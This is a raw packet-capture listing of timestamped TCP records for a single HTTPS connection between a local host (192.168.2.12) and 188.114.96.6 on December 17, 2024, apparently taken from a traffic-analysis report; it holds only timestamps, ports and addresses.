                                                                        Dec 17, 2024 08:38:30.586402893 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.586421967 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.586498976 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.586535931 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.586548090 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.586703062 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.592643023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.592659950 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.592792034 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.592804909 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.592834949 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.600236893 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.600260973 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.600379944 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.600379944 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.600399017 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.606483936 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.606499910 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.606637001 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.606654882 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.613432884 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.613454103 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.613743067 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.613775015 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.757889032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.757915020 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.758058071 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.758058071 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.758074045 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.764873981 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.764885902 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.764925957 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.764934063 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.764938116 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.765016079 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.765100002 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.765100002 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.765115023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.765157938 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.771081924 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.771091938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.771104097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.771130085 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.771331072 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.771331072 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.771348953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.778259039 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.778310061 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.778318882 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.778458118 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.778458118 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.778475046 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.778484106 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.778556108 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.785294056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.785312891 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.785829067 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.785865068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.791927099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.791945934 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.792213917 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.792231083 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.799123049 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.799149036 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.800734043 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.800765038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.805313110 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.805345058 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.805407047 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.805427074 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.805496931 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.950129032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.950155020 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.950285912 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.950285912 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.950305939 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.957262993 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.957278013 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.957334995 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.957341909 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.957350016 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.957422972 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.957422972 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.957530022 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.957530022 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.957547903 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.963453054 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.963468075 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.963485003 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.963509083 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.963727951 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.963727951 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.963743925 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.970603943 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.970710039 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.970719099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.970767975 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.970769882 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.970783949 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.970798016 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.970980883 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.977679968 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.977705002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.977998018 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.978046894 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.984301090 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.984333038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.984468937 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.984493017 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.991439104 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.991463900 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.991616964 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.991616964 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.991632938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.997693062 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.997725964 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.998291969 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.998328924 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.142451048 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.142477989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.142606020 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.142606020 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.142617941 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.149439096 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.149449110 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.149625063 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.149632931 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.149640083 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.149648905 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.149821997 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.149836063 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.149842978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.151374102 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.155703068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.155716896 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.155745983 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.155755043 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.155778885 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.155796051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.155853987 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.162852049 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.162955999 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.162960052 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.162990093 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.163170099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.163176060 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.163239956 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.163239956 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.169881105 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.169903994 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.169956923 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.169977903 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.170205116 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.176681995 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.176707983 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.176805973 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.176826954 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.183667898 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.183686018 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.183783054 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.183799028 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.189905882 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.189928055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.189973116 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.189985991 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.190023899 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.334784031 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.334814072 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.334862947 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.334882021 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.334912062 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.341897011 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.341913939 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.341933966 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.341953993 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.341962099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.341964006 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.341979980 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.341986895 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.342003107 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.342024088 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.348162889 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.348180056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.348196983 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.348203897 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.348268986 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.348283052 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.348298073 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.355268002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.355304003 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.355329990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.355335951 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.355350018 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.355376959 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.362304926 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.362328053 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.362354040 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.362385988 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.362405062 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.362445116 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.368994951 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.369024038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.369070053 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.369091034 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.369110107 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.376112938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.376127958 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.376183987 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.376210928 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.376226902 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.382291079 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.382311106 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.382416964 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.382453918 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.527270079 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.527291059 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.527352095 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.527369976 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.527390957 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.534259081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.534271002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.534288883 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.534297943 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.534307003 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.534342051 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.534341097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.534367085 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.534377098 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.534404039 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.542002916 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.542018890 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.542037010 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.542045116 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.542072058 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.542082071 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.542130947 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.547640085 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.547707081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.547710896 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.547727108 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.547744989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.547755003 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.547763109 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.547776937 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.547800064 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.555774927 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.555794001 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.555937052 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.555946112 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.562165976 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.562186003 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.562311888 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.562321901 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.568608999 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.568627119 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.568677902 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.568700075 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.568715096 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.575625896 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.575663090 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.575702906 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.575722933 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.575773954 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.719686985 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.719715118 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.719760895 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.719782114 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.719822884 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.726675987 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.726695061 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.726752043 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.726762056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.726814985 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.732995033 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.733017921 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.733078003 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.733086109 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.733119011 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.740048885 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.740080118 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.740123987 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.740134954 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.740191936 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.747205019 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.747234106 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.747275114 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.747282982 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.747335911 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.753829956 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.753858089 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.753926039 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.753932953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.753966093 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.760977983 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.761007071 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.761101007 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.761117935 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.761130095 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.761152029 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.767206907 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.767235994 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.767286062 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.767297983 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.767347097 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.913202047 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.913228035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.913276911 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.913294077 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.913324118 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.913345098 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.918998003 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.919017076 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.919095993 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.919105053 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.919148922 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.925209045 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.925228119 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.925281048 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.925287962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.925334930 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.932362080 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.932379007 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.932437897 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.932445049 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.932493925 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.939425945 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.939445019 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.939502954 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.939511061 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.939567089 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.946172953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.946192026 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.946259022 CET49716443192.168.2.12188.114.96.6
